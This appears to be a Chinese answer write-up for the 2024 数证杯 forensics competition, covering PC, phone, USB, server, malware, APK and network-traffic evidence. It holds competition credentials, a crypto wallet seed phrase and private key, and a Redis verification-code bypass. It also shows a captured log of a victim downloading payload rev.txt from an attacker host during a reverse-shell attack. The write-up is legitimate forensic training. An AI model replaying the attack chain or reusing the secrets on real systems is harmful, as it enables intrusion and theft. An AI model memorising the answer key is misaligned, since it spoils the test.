2024数证杯初赛

容器密码

/TP2G-h`q#(Ss!EUq,RR:Ss9"@!R"{-.kNw+-(gwGq.YLDS-|NEWH(GT3;6;

参考答案

U盘

https://mp.weixin.qq.com/s/JmY6-zPnTFuoLPYJbXfZYQ?nwr_flag=1#wechat_redirect

计算机、手机、数据分析

https://mp.weixin.qq.com/s/m0dYixT4Xi1gvK1ggXWr0g?nwr_flag=1#wechat_redirect

https://blog.csdn.net/2301_79200709/article/details/143828185

流量:

https://mp.weixin.qq.com/s/4bluvN_S2HAC9v3TVMP_HQ?nwr_flag=1#wechat_redirect

程序功能:

https://mp.weixin.qq.com/s/1awjjbaF117xjMA2akyTdw?nwr_flag=1#wechat_redirect

计算机取证

密码:

image-20241125192649673

jlb654321

1.对计算机镜像进行分析,计算该镜像中ESP分区的SM3值后8位为?(答案格式:大写字母与数字组合,如:D23DDF44) (2分)

image-20241125194025222

2.对计算机镜像进行分析,该操作系统超管账户最后一次注销时间为?(时区为UTC+08:00)(答案格式如:1970-01-01 00:00:00) (2分)

登出=注销

image-20241125194138297

2024-10-25 22:57:32

3.对计算机镜像进行分析,该操作系统超管账户有记录的登录次数为?(填写数字,答案格式如:1234) (2分)

image-20241125194232828

24

4.对计算机镜像进行分析,该操作系统设置的账户密码最长存留期为多少天?(填写数字,答案格式如:1234) (2分)

image-20241125194616146

42

5.对计算机镜像进行分析,该操作系统安装的数据擦除软件的版本为?(答案格式:1.23) (2分)

image-20241125194457005

5.86

6.对计算机镜像进行分析,该操作系统接入过一名称为“Realtek USB Disk autorun USB Device”的USB设备,其接入时分配的盘符为?(答案格式:A:) (2分)

image-20241125194537111

E

7.对计算机镜像进行分析,该操作系统无线网卡分配的默认网关地址为?(答案格式:127.0.0.1) (2分)

image-20241125194702794

192.168.43.1

8.对计算机镜像进行分析,该操作系统配置的连接NAS共享文件夹的IP地址为?(答案格式:127.0.0.1) (2分)

image-20241125194728165

192.168.188.1

9.对计算机镜像进行分析,写出“吵群技巧.txt”文件SM3值的后8位?(大写字母与数字组合,如:D23DDF44) (2分)

image-20241125194819485

解压出来

image-20241125194901541 image-20241125195212239

80A1D56BB983B51401035AC688C68286D807C2C14E1B002674E3ACBD151515BA

10.对计算机镜像进行分析,该操作系统通过SSH连接工具连接CCTalk测试环境的SSH端口为?(填写数字,答案格式如:1234) (2分)

image-20241125201000494

12849

11.对计算机镜像进行分析,该操作系统通过SSH连接工具连接的CCTalk境外服务器是哪个运营商的?(填写汉字,答案格式:阿里云) (2分)

image-20241125204013037

image-20241125204047343

回收站里的临时文件

image-20241125202910251

18.55.213.79

image-20241125203238289

image-20241125204207780

亚马逊云

12.对计算机镜像进行分析,获取机主保存在本机的U盾序号的后4位数字为?(填写数字,答案格式如:1234) (2分)

image-20241125204248700

image-20241125204443671

image-20241125204514512

image-20241125204456168

6409

13.对计算机镜像进行分析,机主存储的某篇新闻报道“小程序搅动资源争夺战”的发表年份为?(答案格式:2024) (2分)

image-20241125204646474

image-20241125204714913

2019

14.对计算机镜像进行分析,该操作系统访问“环球商贸”的IP地址为?(答案格式:127.0.0.1) (2分)

image-20241125204732149

39.108.126.128

15.对计算机镜像进行分析,“环球商贸”服务器配置的登录密码为?(答案按照实际填写,字母存在大小写) (2分)

image-20241125205444691

LnxBUXEMESGQ6fcB1PwFtTEkqFavMB6qzeWZhCe4pj0=

HQSM#20231108@gwWeB

16.对计算机镜像进行分析,机主安装的PC-Server服务环境的登录密码是?(答案按照实际填写,字母全小写) (2分)

image-20241125205333182

SGtAJx47dC0x51qbUIgKJG3d5yAghF4D

image-20241125205456432

jlb654321

17.对计算机镜像进行分析,机主搭建的宝塔面板的安全入口为?(按实际值填写) (2分)

image-20241125205651761

/c38b336a

18.对计算机镜像进行分析,机主搭建的宝塔环境中绑定的宝塔账号是?(按实际值填写) (4分)

image-20241125205918965

image-20241125210344815

igmxcdsa

*Hyper-V宝塔面板复原

image-20241125210933887 image-20241125211439539

Hyper-V开启

image-20241125211600088

密码为之前解密的jlb654321

image-20241125211747789
jlbvpc
jlb654321

登录成功

image-20241125211838862 image-20241125212517923

19.对计算机镜像进行分析,其搭建的宝塔面板的登录密码为?(按实际值填写) (2分)

image-20241125211339646

123456

20.对计算机镜像进行分析,机主搭建的宝塔环境中绑定的宝塔账号是?(按实际值填写) (4分)

查看宝塔面板的userinfo.json

image-20241125213056384

17859628390

21.对计算机镜像进行分析,机主搭建的宝塔面板中Mysql环境的root密码为?(按实际值填写) (4分)

思路1:搭建起来看

image-20241125212633505

思路2 本机mysql连接

image-20241125212714410

123456

22.对计算机镜像进行分析,机主搭建的宝塔面板中Mysql环境连接的端口号为?(填写数字,答案格式如:1234) (2分)

3306

23.接上题,“卡号分组”表所在的数据库名为?(答案按照实际填写,字母全小写) (4分)

image-20241125212836592

a_train2023

24.接上题,“孙华锦”在2020-07-01 10:49:07时间节点的交易余额为?(答案格式:1234.56) (4分)

思路1:

数据库备份查看

image-20241125213439394

思路2:

image-20241125214215848

image-20241125214143761

6610.94

25.对U盘镜像进行分析,其镜像中共有几个分区?(填写数字,答案格式如:1234) (2分)

*U盘详细查看

R-Studio直接扫描,MBR中识别出来的两个分区

image-20241125220028367

DBR皆被损坏,无法正常解析文件系统

image-20241125220114660

点击扫描,通过格式化恢复,可以扫描出两个分区,与MBR记录的对应起来。

image-20241125220302064

看到分区一的DBR区全是0

image-20241125235336040

看到分区二的DBR区全是F

image-20241125235436878

修复思路就是修复DBR区即可

DBR区修复

FAT32:

EB58904D53444F53352E3000020862190200000000F800003F00FF000008000000580D004F030000000000000200000001000600000000000000000000000000800029F2E019B24E4F204E414D4520202020464154333220202033C98ED1BCF47B8EC18ED9BD007C885640884E028A5640B441BBAA55CD13721081FB55AA750AF6C1017405FE4602EB2D8A5640B408CD137305B9FFFF8AF1660FB6C640660FB6D180E23FF7E286CDC0ED0641660FB7C966F7E1668946F8837E16007539837E2A007733668B461C6683C00CBB0080B90100E82C00E9A803A1F87D80C47C8BF0AC84C074173CFF7409B40EBB0700CD10EBEEA1FA7DEBE4A17D80EBDF98CD16CD196660807E02000F842000666A0066500653666810000100B4428A56408BF4CD136658665866586658EB33663B46F87203F9EB2A6633D2660FB74E1866F7F1FEC28ACA668BD066C1EA10F7761A86D68A56408AE8C0E4060ACCB80102CD1366610F8274FF81C300026640497594C3424F4F544D475220202020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000D0A4469736B206572726F72FF0D0A507265737320616E79206B657920746F20726573746172740D0A0000000000000000000000000000000000000000000000000000000000000000000000AC01B901000055AA

NTFS

EB52904E5446532020202000020800000000000000F800003F00FF0080000000000000008000800000500E0000000000AA980000000000000200000000000000F6000000010000003F0D93B22D93B29A00000000FA33C08ED0BC007CFB68C0071F1E686600CB88160E0066813E03004E5446537515B441BBAA55CD13720C81FB55AA7506F7C101007503E9DD001E83EC18681A00B4488A160E008BF4161FCD139F83C4189E581F72E13B060B0075DBA30F00C12E0F00041E5A33DBB900202BC866FF06110003160F008EC2FF061600E84B002BC877EFB800BBCD1A6623C0752D6681FB54435041752481F90201721E166807BB166852111668090066536653665516161668B80166610E07CD1A33C0BF0A13B9F60CFCF3AAE9FE01909066601E0666A111006603061C001E66680000000066500653680100681000B4428A160E00161F8BF4CD1366595B5A665966591F0F82160066FF06110003160F008EC2FF0E160075BC071F6661C3A1F601E80900A1FA01E80300F4EBFD8BF0AC3C007409B40EBB0700CD10EBF2C30D0A41206469736B2072656164206572726F72206F63637572726564000D0A424F4F544D475220697320636F6D70726573736564000D0A5072657373204374726C2B416C742B44656C20746F20726573746172740D0A000000000000000000000000000000000000000000008A01A701BF01000055AA

winhex使用编辑模式

image-20241126001941738

进入偏移地址

image-20241126002103373
00100000
1AC10000

image-20241126002822887

右键---->编辑---->剪贴板数据---->写入,选择Hex模式

Snipaste_2024-11-26_00-23-13

粘贴成功

Snipaste_2024-11-26_00-24-50

同理

image-20241126002929405

识别成功

image-20241126003002092

26.对U盘镜像进行分析,其中FAT32主分区的FAT表数量有几个?(请使用十进制数方式填写答案,答案格式:1234) (2分)

image-20241125220347954

2个

image-20241126231607146

2

27.对U盘镜像进行分析,其中FAT32主分区定义的每扇区字节数为?(请使用十进制数方式填写答案,答案格式:1234) (2分)

image-20241125220505847

簇(Cluster)确实是文件系统中最小可分配的空间单位

簇大小为4K,8个扇区,定义的扇区大小为512

4×1024 ÷ 8 =512

512

28.对U盘镜像进行分析,其中FAT32主分区的文件系统前保留扇区数为?(请使用十进制数方式填写答案,答案格式:1234) (2分)

在分区开始处保留的一段扇区,这段扇区不包含任何文件系统数据,而是用于其他目的。这些保留扇区通常用于存放一些重要的系统信息或引导代码。

FAT32主分区文件系统前的保留扇区数,指的是FAT32文件系统分区起始到FAT1表位置的扇区数

image-20241126101426693

1.找到FAT32文件系统起始位置

FSINFO一般位于文件系统的1号扇区,就是DBR的下一个扇区。它用来记录文件系统中空闲簇的数量以及下一可用簇的簇号等信息。

扩展引导标志“52 52 61 41”

image-20241126094638913

因为0x10200位置为FAT32的FSINFO扇区标识,所以说0x100000是分区起始位置

2.找到FAT表数据的第一个表项数据

搜索F8 FF FF 0F,找到0x496200是FAT表起始位置

image-20241126110348131

开始计算保留扇区:

扇区16进制转化

image-20241126110743118

(0x496200-0x100000)/0x200

image-20241126111244550

7345

29.对U盘镜像进行分析,其中FAT32主分区的FAT1表相对于整个磁盘的起始扇区数为?(请使用十进制数方式填写答案,答案格式:1234) (2分)

FAT表起始位置,位于0x496200位置

image-20241126111456859

9393

30.对U盘镜像进行分析,其中NTFS逻辑分区的$MFT起始簇号为?(请使用十进制数方式填写答案,答案格式:1234) (2分)

image-20241126111544535

39082

31.对U盘镜像进行分析,其中NTFS逻辑分区的簇大小为多少个扇区?(请使用十进制数方式填写答案,答案格式:1234) (4分)

image-20241126111631802

image-20241126111655350

8

32.对U盘镜像进行分析,请从该镜像的两个分区中找出使用“新建文本文档.txt”记录的同一个MD5值的两部分信息,并写出该MD5值的第13--20位字符串。(答案格式:大写字母与数字组合,如:D23DDF44) (4分)

发现一个打不开的图片

image-20241126153619379

image-20241126154208455

补全文件开头签名

image-20241126154317410

FAT32分区的成功打开:

image-20241126154345381

同理NTFS:

image-20241126154848918

D668AEE2

手机取证

1.对手机镜像进行分析,机主微信ID号为?(答案按照实际填写,字母全小写) (2分)

image-20241126174707096

image-20241127000209069

wxid_gvlyzqeyg83o22

2.对手机镜像进行分析,机主在2023年12月登录宝塔面板使用的验证码为?(填写数字,答案格式如:1234) (2分)

image-20241126174730923

482762

3.对手机镜像进行分析,小众即时通讯“鸽哒”应用程序的最后更新时间为?(答案格式如:1970-01-01 00:00:00) (2分)

image-20241127000322126

2024-09-20 09:25:19

*鸽哒小众软件取证

image-20241127001232932

image-20241127001352557

VC信息

4.对手机镜像进行分析,该手机中记录的最后一次开机时间。(答案格式如:1970-01-01 00:00:00) (2分)

image-20241127000343072

2024-10-24 11:27:14

5.对手机镜像进行分析,该手机中高德地图APP应用的登录ID为?(答案按照实际填写) (2分)

image-20241127000415589

950980338

6.对手机镜像进行分析,该手机中高德地图APP应用登录账号头像的SHA-256值前8位为?(答案格式:大写字母与数字组合,如:D23DDF44) (2分)

image-20241127000742534

位置为:

AppAttach\GaoDeMap\2gxjmblm36vho415yyv8ik8q20

image-20241127000822337

572589da

7.对手机镜像进行分析,其中20220207-20230206的微信账单文件的解压密码为?(答案格式:按实际值填写) (2分)

image-20241127001447066

在图片里找

image-20241127001508759

847905

8.对手机镜像进行分析,机主在手机中存储的一张复古土砌矮墙照片的拍摄地为哪个城市?(答案格式:北京市) (2分)

image-20241127000958079

image-20241127001029676

景德镇市

9.对手机镜像进行分析,通过AI合成的人脸照片中,有几张照片是通过本机当前安装的AI照片合成工具生成,并有对应记录的?(填写数字,答案格式如:1234) (4分)

image-20241127005030782

image-20241127001935712

可疑包名

image-20241127002004009

3条记录

3

10.对手机镜像进行分析,统计出通讯录号码归属地第二多的省份是?(答案格式:广东) (4分)

image-20241127002830363

导出

image-20241127003038026

福建

11.对手机镜像进行分析,找出“季令柏”身份证号后4位为?(答案格式:1234) (2分)

image-20241127002628682

在本地查看

image-20241127002704629

打不开

用winhex查看,补全文件头:

image-20241127002731674

可以打开了

image-20241127002556276

8043

12.对手机镜像进行分析,找出接收“葵花宝典1.doc”文件使用的应用程序的第一次安装时间为?(答案格式如:1970-01-01 00:00:00) (2分)

image-20241127003126683

查看telegram第一次安装时间

image-20241127003231588

2024-09-20 09:29:40

13.对手机镜像进行分析,机主使用的小众即时通讯应用使用的服务器IP为?(答案格式:127.0.0.1) (2分)

鸽哒数据库查看

image-20241127003518152

163.179.125.64

14.对手机镜像进行分析,机主在哪个平台上发布过转让传奇游戏币的信息,请写出该平台应用APP的包名?(答案格式:com.abcd) (4分)

image-20241127003926970

com.jiuwu

15.对手机镜像进行分析,其中有一“双色球”网页的玩法规则中定义的“三等奖”的奖金是多少?(填写数字,答案格式如:1234) (4分)

关键词中奖

image-20241127005328301

https://www.lottery.gov.cn/dlt/index.html

https://www.lottery.gov.cn/jc/index.html

https://www.lottery.gov.cn/cz/index.html

https://www.lottery.gov.cn/xdgg/

https://www.lottery.gov.cn/plwf/index.html

https://www.lottery.gov.cn/qxc/index.html

https://www.cwl.gov.cn/fcpz/yxjs/ssq/

https://www.cwl.gov.cn/fcpz/yxjs/ggl/

https://www.cwl.gov.cn/fcpz/yxjs/fc3d/

https://www.cwl.gov.cn/fcpz/yxjs/kl8/

image-20241127005434948

3000

16.对手机镜像进行分析,找出手机连接过的米家摄像头终端设备的用户ID为?(答案格式:答案按照实际填写) (2分)image-20241127003634644

2968704175

17.对手机镜像进行分析,找出手机连接过的米家摄像头终端设备的IP地址为?(答案格式:127.0.0.1) (4分)

image-20241127004945289

117.31.116.56

数据分析

1.对计算机,手机,U盘镜像检材综合分析,找出计算机中VC加密容器使用的登录密钥文件,其中逻辑大小较小的文件占用多少个字节?(答案格式:1234) (4分)

从手机检材中找到VC解密方式,登录密钥文件为桌面上finalshell+winhex的快捷方式

image-20241126205218805 image-20241126205245412 image-20241126205319136

挂载设备

image-20241126205355327

选择秘钥文件挂载

image-20241126205425103

挂载成功

image-20241126205442025

较小的文件为WinHex快捷方式

image-20241126205526894

1561

2.对计算机,手机,U盘镜像检材综合分析,写出存储的“带彩计划.txt”文件的SM3哈希值前8位;(大写字母与数字组合,如:D23DDF44) (2分)

image-20241126210453945

AF30FFA1

3.对计算机,手机,U盘镜像检材综合分析,写出存储的“Shakepay买币,提币流程.ppt”文件在当前分区的起始簇号;(填写数字,答案格式如:1234) (4分)

image-20241126210649092

44378

4.对计算机,手机,U盘镜像检材综合分析,写出存储在手机中,用于访问钱包地址的网站登录密码;(答案按照实际填写,字母全大写) (4分)

5.对计算机,手机,U盘镜像检材综合分析,写出存储的钱包地址的前8位;(答案格式:abcd1234) (4分)

image-20241127171218806

fall scene sleep citizen sample drift always danger wait rich leisure vague

浏览器中的以太坊钱包

image-20241127171709056

image-20241127171732758

0x91cCcA87583969193D87e8A890Beb396687b36c0

思路2:

image-20241127172447744

0x91cCcA87583969193D87e8A890Beb396687b36c0

6.对计算机,手机,U盘镜像检材综合分析,写出存储的钱包地址私钥的前8位;(答案格式:abcd1234) (4分)

image-20241127172056072 image-20241127172115794

思路2:

image-20241127172501080

e87dca4ce90cdc372dcb3b83a4b06940daa7b41534a2b4d6906abe6d1f861108

7.对计算机,手机,U盘镜像检材综合分析,统计出机主微信账单从210207-240206期间发生的转入金额第三高的“对方卡号”字段的值为?(答案格式:汉字) (2分)

8.对计算机,手机,U盘镜像检材综合分析,统计出机主微信账单从210207-240206期间发生的“对方卡号”字段值为“陈建设”的转出净值为?(填写数字,答案格式如:1234) (2分)

9.对计算机,手机,U盘镜像检材综合分析,统计出机主微信账单从210207-240206期间发生的交易笔数第三多的数量为?(填写数字,答案格式如:1234) (2分)

10.对数据分析检材中的第01-数据进行分析,办案人员从多个赌博网站中导出了100多份的报表,请统计出所有平台会员使用本币充值的总金额是多少?(答案格式:仅数字,结果不保留小数) (2分)

11.对数据分析检材中的第02-数据进行分析,办案人员在电脑中找到多个赌博网站的交易流水报表,每个报表都是以网站编号和年份命名,每个月独立生成一个sheet页。请统计出所有的交易流水总金额是多少?(答案格式::123456) (2分)

12.对数据分析检材中的第03-数据进行分析,请从赌博平台的用户登录日志表中,统计出2020年1月1号至2020年6月30号,总共有多少位会员登录了该平台?(答案格式:123456) (2分)

13.对数据分析检材中的第03-数据进行分析,通过还原赌博平台数据库备份文件,请统计用户投注总次数前5的彩种开奖总次数?(涉及的数据库表:ssc2022_bets,ssc2022_data)(答案格式:123456) (4分)

14.对数据分析检材中的第03-数据进行分析,请统计出在不止一种彩种上进行过投注的用户数量,并计算他们在2018年一共涉及了平台多少流水?(答案格式:保留三位有效数字,如:123.123) (4分)

服务器取证

1.对服务器检材进行分析,站点服务器可能是从哪个云服务平台上调证过来的?(填写汉字,答案格式:亿速云) (2分)

image-20241120150907903

阿里云

2.对服务器检材进行分析,站点服务器中数据库的密码是?(按实际值填写) (2分)

发现激活的配置文件是sxj。

Spring Boot允许根据不同的环境(如开发、测试、生产等)加载不同的配置文件,这里指定了使用名为sxj的配置文件。

image-20241120151541364

发现密码

image-20241120151727169

Sxy000**

3.对服务器检材进行分析,站点服务器用于提供服务发现的工具名是?(答案格式:zookeeper) (4分)

看历史记录

consul

4.对服务器检材进行分析,站点服务器数据库配置文件名是?(答案格式:database.php) (2分)

application-sxj.yaml

5.对服务器检材进行分析,该网站涉及的APP名称是?(答案格式:微信) (2分)

image-20241120151854468

顺心借

6.对服务器检材进行分析,该网站用于存储大量身份证照的OSS中的AccessKeyID后八位是?(答案格式:按实际值填写) (2分)

image-20241120151939216

EuZJybzD

7.对服务器检材进行分析,站点服务器用于消息转发代理工具所使用的端口号是?(填写数字,答案格式:3306) (2分)

RabbitMQ是实现了高级消息队列协议的开源消息代理软件

image-20241120152308001

5672

8.对服务器检材进行分析,站点服务器用于启动定时任务的代码片段存在于?(答案格式:LoginIndex.class) (4分)

image-20241120153201653

MobileStatusTask.class

9.对服务器检材进行分析,站点服务器用于验证用户输入的验证码是否匹配的代码片段存在于?(答案格式:LoginIndex.class) (4分)

image-20241120153242673

AdminIndexConller.class

10.对服务器检材进行分析,数据库服务器中Docker容器镜像中mysql的镜像ID号前6位是?(答案格式:123asd) (2分)

image-20241120153315850

23b013

11.对服务器检材进行分析,数据库服务器中DockerCompose的版本号是?(答案格式:1.1.1) (2分)

find / -name docker-compose

返回:
/usr/libexec/docker/cli-plugins/docker-compose
chmod +x docker-compose
./docker-compose -v

返回:
Docker Compose version v2.27.1

2.27.1

12.对服务器检材进行分析,数据库服务器中用于存储后台登录账号的数据表名是?(答案格式:login) (2分)

image-20241120154204829

sys_user

13.对服务器检材进行分析,后台管理员“xpt-0”所绑定的手机号码是?(答案格式:13001880188) (2分)

同上

19521510863

*服务器搭建

查看mysql地址

image-20241120154623171

rm-bp18td28bsh13f5jy.mysql.rds.aliyuncs.com

我数据库重组ip为172.19.62.72,端口为9734

image-20241120154707110

首先host添加172.19.62.72

vim /etc/hosts

image-20241120154848386

测试连接成功:

image-20241120154836122

改jar包端口

image-20241120155142945

查看前端

netstat -nltp | grep nginx

image-20241120155312030

去对应端口测试

image-20241120155345837

发现API访问的是47.96.140.186端口,改为system的ip

vscode一搜都是

image-20241120155505434

发现使用的ip是47.96.140.186,因此需要替换/www/admin中所有的47.96.140.186变成我们system.E01的ip

find /www/admin -type f -name "*.js" -exec sed -i 's/47.96.140.186/192.168.160.131/g' {} +

修改成功

image-20241120155730220

启动rabbitmq

systemctl start rabbitmq-server.service 

启动失败,分析/var/lib/rabbitmq/erl_crash.dump

分析工具:https://github.com/ferd/recon/blob/master/script/erl_crashdump_analyzer.sh

chmod +x erl_crashdump_analyzer.sh
./erl_crashdump_analyzer.sh erl_crash.dump

返回结果:

analyzing erl_crash.dump, generated on:  Wed Nov 20 16:03:44 2024

Slogan: Kernel pid terminated (application_controller) ({application_start_failure,rabbitmq_prelaunch,{{shutdown,{failed_to_start_child,prelaunch,{epmd_error,"iZbp1gma2uf9hvsnbu9mdkZ",timeout}}},{rabbit_prelaunch_app,start,[normal,[]]}}})

Memory:
===
  processes: 12 Mb
  processes_used: 12 Mb
  system: 12 Mb
  atom: 0 Mb
  atom_used: 0 Mb
  binary: 0 Mb
  code: 6 Mb
  ets: 1 Mb
  ---
  total: 25 Mb

Different message queue lengths (5 largest different):
===
      1 1
      9 0

Error logger queue length:
===

File descriptors open:
===
  UDP:  0
  TCP:  0
  Files:  0
  ---
  Total:  0

Number of processes:
===
10

Processes Heap+Stack memory sizes (words) used in the VM (5 largest different):
===
      1 6772
      1 2586
      1 1598
      5 233
      2 4

Processes OldHeap memory sizes (words) used in the VM (5 largest different):
===
      1 28690
      1 987
      1 376
      1 OldHeap unused: 692
      1 OldHeap unused: 352

Process States when crashing (sum):
===
      1 CONNECTED
      1 Current Process Internal ACT_PRIO_NORMAL | USR_PRIO_NORMAL | PRQ_PRIO_NORMAL | ACTIVE | RUNNING
      1 Current Process Running
      3 Internal ACT_PRIO_HIGH | USR_PRIO_HIGH | PRQ_PRIO_HIGH | OFF_HEAP_MSGQ
      1 Internal ACT_PRIO_MAX | USR_PRIO_MAX | PRQ_PRIO_MAX | OFF_HEAP_MSGQ
      4 Internal ACT_PRIO_NORMAL | USR_PRIO_NORMAL | PRQ_PRIO_NORMAL
      1 Internal ACT_PRIO_NORMAL | USR_PRIO_NORMAL | PRQ_PRIO_NORMAL | ACTIVE | RUNNING
      1 Internal ACT_PRIO_NORMAL | USR_PRIO_NORMAL | PRQ_PRIO_NORMAL | OFF_HEAP_MSGQ
      1 Running
      9 Waiting

关键部分:

Slogan: Kernel pid terminated (application_controller) ({application_start_failure,rabbitmq_prelaunch,{{shutdown,{failed_to_start_child,prelaunch,{epmd_error,"iZbp1gma2uf9hvsnbu9mdkZ",timeout}}},{rabbit_prelaunch_app,start,[normal,[]]}}})

解释关键部分:

{epmd_error,"iZbp1gma2uf9hvsnbu9mdkZ",timeout}: 具体的失败原因是 EPMD(Erlang Port Mapper Daemon)与主机 	"iZbp1gma2uf9hvsnbu9mdkZ" 的通信超时。

解析iZbp1gma2uf9hvsnbu9mdkZ超时,查看hosts文件

image-20241120160809687

改为

127.0.0.1 iZbp1gma2uf9hvsnbu9mdkZ

image-20241120160841439

测试成功

image-20241120160913402

systemctl start rabbitmq-server.service

成功启动,出现端口号5672:

image-20241120161050598

启动/root/consul.sh

./consul.sh

查看端口是否启动

image-20241120161334183

启动/data/jar.sh

java -jar cal-0.0.1-SNAPSHOT.jar

进入网页发送验证码给咱们启用的用户13238424249

image-20241120162839884
密码为Sxy000**

使用13238424249手机号

Redis 命令用于设置一个键值对并为其设置过期时间,单位为秒

SET ADMIN-PHONE13238424249 1234
EXPIRE ADMIN-PHONE13238424249 600

image-20241120164947450

image-20241120180534146

验证码填1234

image-20241120165543556

14.对服务器检材进行分析,用户首次借款初始额度是?(填写数字,答案格式:1) (2分)

image-20241120174329899

4000

15.对服务器检材进行分析,受害者在平台中一共结款了几次?(填写数字,答案格式:1) (2分)

image-20241120174402873

1857

16.对服务器检材进行分析,该平台中所有下单用户成功完成订单总金额是?(填写数字,答案格式:1) (2分)

image-20241120174417448

11066700

17.对服务器检材进行分析,该平台中逾期费率是?(答案格式:1.1) (2分)

image-20241120174439710

0.1

18.对服务器检材进行分析,该平台中累计还款总金额是?(填写数字,答案格式:1) (2分)

image-20241120174417448

10194700

19.对服务器检材进行分析,该平台总共设置了多少种借款额度?(填写数字,答案格式:1) (2分)

image-20241120174610875

有一个禁用

18

20.对服务器检材进行分析,该平台一共有多少个借款渠道?(填写数字,答案格式:1) (2分)

image-20241120174658753

131

21.对服务器检材进行分析,该平台对已完成用户收取了总计多少元服务费,结果精确到整数?(填写数字,答案格式:123) (2分)

image-20241120174724350

4051915

程序功能分析

1.对exe程序检材进行分析,计算程序的MD5(128bit)校验值的最后八位是?(答案格式:大写字母与数字组合,如:D23DDF44) (2分)

对安全性未知或可疑的exe程序进行分析时推荐在虚拟机环境中进行操作,防止运行exe时释放病毒、木马感染宿主机

mmc.exe是系统管理程序的一个框架程序,全称是Microsoft Management Console,它提供给扩展名为msc的管理程序一个运行的平台

运行Procmon64.exe进程监控程序,设置过滤条件,如下图,分别在下拉中选择

“Process Name”“is”“mmc.exe”点击“Add”

“Operation” “is” “WriteFile”点击“Add”

image-20241127011158122

释放样本文件:

image-20241127011255967

C:\Users\ddxl\AppData\Local\Temp\《国际论坛》外审专家邀请函与文章评审单.docx
C:\Program Files\Cloudflare\Warp.exe
C:\Program Files\Cloudflare\7z.dll

计算Warp.exe

image-20241127011439377

93ff791e

2.对exe程序检材进行分析,找出其释放的可执行程序的路径?(答案格式:D:\Document\Aaaa) (2分)

C:\Program Files\Cloudflare

3.对exe程序检材进行分析,找出其启动释放的可执行程序时命令的最后一个参数是什么?(答案格式:按实际值填写) (2分)

在任务管理器中查看Warp.exe进程的命令行参数,可知,其启动参数为“t 8.8.8.8”,最后一个参数为“8.8.8.8”

image-20241127011720148

8.8.8.8

4.对exe程序检材进行分析,该程序在执行时,会解密并写入一段字节码到Chakra模块的一个特定导出函数的内存地址中,以此来伪装调用的目的,请给出这个导出函数的名称?(答案格式:按实际函数名称填写) (2分)

使用x32dbg.exe程序对Warp.exe进行动态调试分析

5.对exe程序检材进行分析,请问Chakra模块的代码段被修改了多少字节(答案格式:0x1122) (2分)

6.对exe程序检材进行分析,解密出的字节码数据中携带着PE格式的数据,并且_IMAGE_NT_HEADERS头部的PE签名已经被修改,请给出修改后的签名值(答案格式:0x11 0x22) (2分)

7.对exe程序检材进行分析,解密出的字节码数据中携带着PE格式的数据,并且节区数据被加密,请分析给出解密第一个节区时使用的秘钥(答案格式:0x1B 0x22 0x33 0x4A) (4分)

8.对exe程序检材进行分析,这份字节码数据解密前的密文第一个字节是什么(例如:0x1B) (4分)

9.分析检材APK中检材-01.apk,获取其md5(128bit)校验值的后八位?(答案格式:大写字母与数字组合,如:D23DDF44) (2分)

image-20241127092726753

ceaebf87

10.分析检材APK中检材-01.apk,请写出app的包名?(答案格式:com.xxx.xxx) (2分)

image-20241127092848995

com.changbo.pro

11.接上题,请给出app的加固方式;(答案格式:梆梆) (2分)

image-20241127092902965

360加固宝

12.接上题,请给出app启动时主页面显示的activity名称;(答案格式:com.xxx.xxx.Mainactivity) (2分)

image-20241127092923199

com.changbo.pro.ui.splash.SplashActivity

13.分析检材APK中检材-01.apk,请给出加密的访问地址的数据是? (4分)

image-20241127160629290

记住这么个路径吧

14.分析检材APK中检材-01.apk,请给出解密后的域名为?(答案格式:需要加上端口号,如: http://tieba.com:6666 ) (4分)

image-20241127095107117

脱壳后重新分析

image-20241127160657762

image-20241127160702923

image-20241127160651721

http://yueze.cc:8777

15.接上题,请给出解密调用的so的名称;(答案格式:abc_amm) (4分)

16.对检材APK中检材-02.apk分析,获取其中的flag;(答案格式:flag{ISEC-C6d-ddd-7gd}) (4分)

17.对检材APK中检材-03.apk分析,获取其中的flag;(答案格式:flag{ISEC-C6d-ddd-7gd}) (4分)

网络流量分析

1.分析网络流量包检材,写出抓取该流量包时所花费的秒数?(填写数字,答案格式:10) (2分)

image-20241126180700616

3504

2.分析网络流量包检材,抓取该流量包时使用计算机操作系统的build版本是多少?(答案格式:10D32) (2分)

image-20241126180739100

23F79

3.分析网络流量包检材,受害者的IP地址是?(答案格式:192.168.1.1) (2分)

总体看应该是192.168.75.131

image-20241126180907919

后文具体分析了

192.168.75.131

4.分析网络流量包检材,受害者所使用的操作系统是?(小写字母,答案格式:biwu) (2分)

image-20241126185616299

ubuntu

5.分析网络流量包检材,攻击者使用的端口扫描工具是?(小写字母,答案格式:abc) (2分)

image-20241126185703074

nmap

6.分析网络流量检材,攻击者使用的漏洞检测工具的版本号是?(答案格式:1.1.1) (2分)

User-Agent里面看

image-20241126185922390

image-20241126185946492

3.1.0

7.分析网络流量包检材,攻击者通过目录扫描得到的 phpliteadmin 登录点是?(答案格式:/abc/abc.php) (2分)

往上扫描了很多,最后只有http://192.168.75.131/dbadmin返回了301

image-20241126181758062

往下,看/dbadmin/test_db.php,查看数据包内容

查看数据包内容,是login登录信息

image-20241126182330195

/dbadmin/test_db.php

8.分析网络流量包检材,攻击者成功登录到 phpliteadmin 时使用的密码是?(答案格式:按实际值填写) (2分)

思路:

http and http.request.method==POST and http contains "login"

image-20241126183046557

选第一个

image-20241126184319652

显示为HTML

image-20241126184345608

看另一个

登录成功了

image-20241126185025041

image-20241126185049492

admin

9.分析网络流量包检材,攻击者创建的 phpinfo 页面文件名是?(答案格式:abc.txt) (4分)

http and http contains "phpinfo"

image-20241126190158501

查看第四个

image-20241126190520247

攻击者创建的 phpinfo 页面文件名是demo.php

image-20241126190603077

demo.php

10.分析网络流量包检材,攻击者利用服务器漏洞从攻击机上下载的 payload 文件名是?(答案格式:abc.txt) (4分)

由第4题可知受害者使用的操作系统为ubuntu,在ubuntu中最为常见的下载工具是wget,因此在过滤栏中输入命令

http contains "wget"

进行过滤,可知攻击者利用服务器漏洞从攻击机上下载的 payload 文件名是rev.txt

image-20241126191659429

rev.txt

11.分析网络流量包检材,攻击者反弹shell的地址及端口是?(答案格式:192.168.1.1:1234) (4分)

http contains "shell"

追踪最后一个

GET /rev.txt HTTP/1.1
User-Agent: Wget/1.13.4 (linux-gnu)
Accept: */*
Host: 192.168.75.132:2000
Connection: Keep-Alive


HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.11.8
Date: Wed, 31 Jul 2024 06:44:32 GMT
Content-type: text/plain
Content-Length: 2425
